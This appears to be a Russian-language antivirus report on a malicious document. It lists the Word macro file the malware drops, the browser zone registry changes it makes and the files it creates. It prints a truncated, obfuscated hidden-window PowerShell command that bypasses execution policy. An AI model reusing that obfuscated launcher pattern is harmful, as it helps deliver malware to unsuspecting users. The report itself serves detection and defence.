Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\A9Rt045e2_1308xc4_1eo.tmp\919494.docm"
- '<SYSTEM32>\cmd.exe' /CpowERsHElL -NOPr -windOWStylE HiDDen -Exe BYpaSS ".( $EnV:COmSpeC[4,26,25]-JoIN'') ( \"$(SEt-item 'VaRiaBLe:OFs' '' ) \"+[strInG][Char[]] (115 ,69 , 116 , 45,105,116 ,69, 109, 32,32,40...
Изменяет следующие настройки браузера Windows Internet Explorer
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\a9rt045e2_1308xc4_1eo.tmp\919494.docm
- %LOCALAPPDATA%\adobe\acrocef\dc\acrobat\cookie\cookies-journal
- %TEMP%\etilqs_ijff7pridjd0opc
- %LOCALAPPDATA%\adobe\acrocef\dc\acrobat\cookie\cookies
- %TEMP%\a9raqytrr_1308xc6_1eo.tmp
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /CpowERsHElL -NOPr -windOWStylE HiDDen -Exe BYpaSS ".( $EnV:COmSpeC[4,26,25]-JoIN'') ( \"$(SEt-item 'VaRiaBLe:OFs' '' ) \"+[strInG][Char[]] (115 ,69 , 116 , 45,105,116 ,69, 109, 32,32,40...' (со скрытым окном)
